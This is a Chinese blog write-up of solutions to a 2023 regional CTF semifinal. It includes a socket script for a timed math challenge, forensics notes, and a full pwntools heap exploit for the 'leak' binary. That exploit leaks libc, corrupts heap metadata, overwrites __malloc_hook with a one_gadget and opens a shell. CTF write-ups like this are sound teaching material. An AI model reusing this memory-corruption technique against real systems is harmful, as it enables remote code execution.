2023年第四届闽盾杯复赛WP

最新推荐文章于 2024-07-22 18:12:51 发布
最新推荐文章于 2024-07-22 18:12:51 发布
阅读量692 收藏 4
点赞数
分类专栏: 网络安全CTF 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xccwxy/article/details/130918203
版权
文章展示了使用Python进行加密游戏的解决过程,包括网络连接,正则表达式解析,以及数学计算。同时,文章还涉及到内存取证技术,通过HxD工具和base64编码来查找并解码标志。此外,文章还提供了一个利用pwn库进行远程服务器交互的exploit示例,用于泄露内存信息和执行特定操作。
摘要由CSDN通过智能技术生成

Crypto-py-math-game

nc连接测试

根据要求三秒给出答案才能输出flag值

利用python编写exp进行处理

Exp:

import socket
import re
com = re.compile("n = (\d.*)")
c = socket.socket(2, 1)
c.connect(("39.104.54.154", 33057))
name = c.recv(1024).decode()
yunsuan = re.search("(n.*) = \?", name)
yn = yunsuan.groups()[0].replace("X","*")
value = com.search(name).groups()[0]
# print(yn, value)
print(name)
n = int(value)
n = eval(yn)
n = str(n) + "\n"
c.send(n.encode('utf-8'))
ddd = c.recv(1024)
print(ddd.decode())
while True:
    c.send(input().encode('utf-8'))
    ddd = c.recv(1024)
    print(ddd.decode())
c.close()

Flag:flag{35946f7510}

MISC-威胁情报分析2

两个文件进行数据对比,利用python编写脚本对数据文件进行分析

发现可疑数据

Flag:flag{lprbriry.net}

MISC-内存取证

直接将lm-lime文件放在HxD中去进行检索得flagbase64编码后的字符串

对base64进行解码得flag

Flag:flag{12qwaszxcde3}

PWN-leak

分析

跟进sub_9BF()

sub_ABC()

EXP:

from pwn import *

def s(a): p.send(a)

def sa(a, b): p.sendafter(a, b)

def sl(a): p.sendline(a)

def sla(a, b): p.sendlineafter(a, b)

def r(): p.recv()

def pr(): print(p.recv())

def rl(a): return p.recvuntil(a)

context(os='linux', arch='amd64', log_level='debug')

#p = process('./leak')

p = remote('', )

elf = ELF('./leak')

libc = ELF('./libc-2.27.so')

def add(idx, size):

    sla(b': ', b'1')

    sla(b': ', str(idx))

    sla(b': ', str(size))

def edit(idx, data):

    sla(b': ', b'2')

    sla(b': ', str(idx))

    sa(b': ', data)

def show(idx):

    sla(b': ', b'3')

    sla(b': ', str(idx))

def free(idx):

    sla(b': ', b'4')

    sla(b': ', str(idx))

add(0, 0x18)

edit(0, p64(0)*3 + p64(0xd91))

add(1, 0x1008)

add(2, 0xd50)

show(2)

x = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

libc_base = x - 0x3ec2a0

malloc_hook = libc_base + libc.sym['__malloc_hook']

one_gadget = libc_base + 0x10a2fc

edit(1, b'\x00'*0x1008 + p64(0xffffffffffffffff))

add(3, - 0x22010)

add(4, 0x100)

edit(4, b'\x07'*0x30 + p64(malloc_hook)*0x10 + b'\n')

add(5, 0xa0)

edit(5, p64(one_gadget) + b'\n')

add(6, 0x200)

p.interactive()

Flag:flag{8ac27ed206}

Flag:flag{8ac27ed206}

Sentry_Shark
关注
专栏目录
2023闽盾线上初赛Crypto wp
qq_41626232的博客
05-25 869
实际上m<512bits也能格出来,但是最好是已知flag的长度,构造相应的格。然后对于结果矩阵R只知道第0,2,4,6次项。所以我只需要取出变换矩阵p的第0,2,4,6行。其中p为变换矩阵,N为Jordan标准型,不知道的话可以搜一下学一学。后来就变成矩阵的运算了,这块递推还是自己看比较好。就是dsa签名,然后私钥取值太小了,考虑用格解一下就出了。是一个小于512bits,即小于64字节的flag。的第一位,也就是上面矩阵运算结果的第一位。下面我们的问题就转成矩阵运算的形式了。,然后带入到第一个等式中。
2023福建省第四届闽盾”-黑盾赛道-从线上初赛到线下决赛-WriteUp
君逍遥o
09-08 2310
2023福建省第四届闽盾”-黑盾赛道-从线上初赛到线下决赛-WriteUp
2024闽盾-黑盾赛道CTF初赛部分WP
最新发布
swordcloud_xm的博客
07-22 748
在当今数字化时代,网络安全已成为全球关注的焦点。随着技术的发展,网络攻击手段日益复杂化,这不仅对个人用户,也对企业乃至国家安全构成了严峻挑战。为了应对这些挑战,培养网络安全人才,提高公众的安全意识和技能,各类网络安全竞赛应运而生。"闽盾-黑盾赛道CTF初赛"正是在这样的背景下举办的一次重要赛事。CTF,即Capture The Flag,是一种流行的网络安全竞赛形式,它通过模拟真实环境下的攻防对抗,考验参赛者的网络安全知识和实战技能。本次赛事吸引了众多网络安全爱好者和专业人士的参与。
2024闽盾-本科组wp(部分)
weixin_47099592的博客
07-03 476
这pdf打ssrf之前打过渗透在奇安信社区看到过,但是他过滤了src if等函数,所以我们搜索到https://blog.csdn.net/weixin_57567655/article/details/124410698。题目描述htmltopdf, 搜索得到https://github.com/wooio/htmltopdf-java/代码审计并没发现问题,但发现引用了https://github.com/wkhtmltopdf/wkhtmltopdf。发现程序和第I列有关,而且表格缺少了第I列。
2024闽盾初赛 Crypto&MISC
qq_63923205的博客
06-24 453
闽盾2024复现
台州市2023青少信息学竞赛复赛试题(初中组)
05-03
### 台州市2023青少信息学竞赛复赛试题(初中组) #### 知识点概述 根据给定的文件信息,本次竞赛主要针对初中生的信息学能力进行考核,涉及四个不同的题目:站直线、找数对、子矩阵、数列划分。这些题目不仅...
台州市2023青少信息学竞赛复赛试题(小学组)
05-03
本次台州市2023青少信息学竞赛复赛针对小学组设计了四道传统类型的题目,旨在考察学生的算法思维能力和编程实践能力。这四道题目分别为:“使用时长”、“性价比”、“单词接龙”以及“挖啊挖”。每个题目都设有...
第三届华为云无人车挑战复赛Top1方案, yolov4, mindspore.zip
11-09
挑战大赛相关代码、设计文档、使用说明,供参考 挑战大赛相关代码、设计文档、使用说明,供参考 挑战大赛相关代码、设计文档、使用说明,供参考 挑战大赛相关代码、设计文档、使用说明,供参考 挑战大赛...
第三届华为云无人车挑战复赛Top1方案
09-23
【第三届华为云无人车挑战复赛Top1方案】是一个聚焦于无人车技术与数学建模相结合的竞赛项目。在此次赛事中,参赛队伍需要利用先进的算法和技术解决无人驾驶汽车面临的具体问题,以实现最佳的解决方案。这个压缩包...
2021-2022收藏的精品资料上海市第二十六届初中物理竞赛大同复赛试题及答案.docx
09-17
4. 电磁场对人体的影响:特斯拉线圈产生的电火花电压高,电流虽小,但表演者穿着含有金属丝的防护服,电流通过防护服导走,避免了对人体的伤害。 5. 物理运动状态判断:根据塑料中水的位置变化,可以推理火车的...
记2022福建省第三届“闽盾”网络空间安全大赛黑盾赛道从线上初赛到决赛writeup解析
君逍遥o
09-08 600
记2022福建省第三届“闽盾”网络空间安全大赛黑盾赛道从线上初赛到决赛writeup解析
NSSCTF之Misc篇刷题记录⑩
Aluxian_的博客
05-11 1995
[CISCN 2022 初赛]ez_usb [SWPUCTF 2021 新生赛]你喜欢osu吗? [SWPUCTF 2021 新生赛]Bill [SWPUCTF 2021 新生赛]二维码不止有二维码 [HGAME 2022 week1]好康的流量 [红明谷CTF 2022]MissingFile [广东省大学生攻防大赛 2021]这是道签到题 [羊城 2022]签个到
福建省第二届“闽盾”部分Write Up
weixin_45935838的博客
12-03 2171
WP—decode 根据题目已知: n1: 15228664629164509105936278301396170708905691970126305196584505186788860519598413718493859625462561931380632032431490419378905593909771649295663481782473029836321132574188559245931660756414915507930357509270674460219615256962333464689
墨者靶场 WordPress插件漏洞分析溯源
永远是少年
12-30 1546
今天继续给大家介绍CTF刷题,本文主要内容墨者靶场 WordPress插件漏洞分析溯源。 一、题目简介 二、解题实战
2023全国大学生信息安全竞赛安徽省赛-初赛WP
qq_43647197的博客
09-27 3262
2023全国大学生信息安全竞赛安徽省赛-初赛WP
网络安全日志分析-题集1-[闽盾 2021]日志分析
m0_51198141的博客
12-01 641
flag 为 password 字段值日志分析势必要知道日志的行为,这道题知道Password使用的是Sql布尔盲注,依次分析即可,这里的password只有十位,所以手动和自动化都无所谓,但是如果再长就需要进行自动化处理,
[闽盾 2021]decode
2301_80218721的博客
12-14 159
题目给出了n1,n2,n3;将得到的这个三个结果拼起来就是flag。
NSSCTF Crypto靶场练习,31-40WP
Sciurdae的博客
12-12 1081
说说知识点,p和q都是小明文攻击,因为e是2,且p的2次方明显小于n,所以都直接对P和Q开方就可以得到p,q了。根据hint,下一个是栅栏密码,要先提示信息 doyouknowfence删除,不然解不出来,而且这里用的是加密。维吉尼亚密码,网站嗦一下https://www.guballa.de/vigenere-solver。这样可以求出 n1和n2 的最大公约数,继而求出p1,再求 n2和n3 的最大公约数,求出p3。WP链接:https://www.nssctf.cn/note/set/2178。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值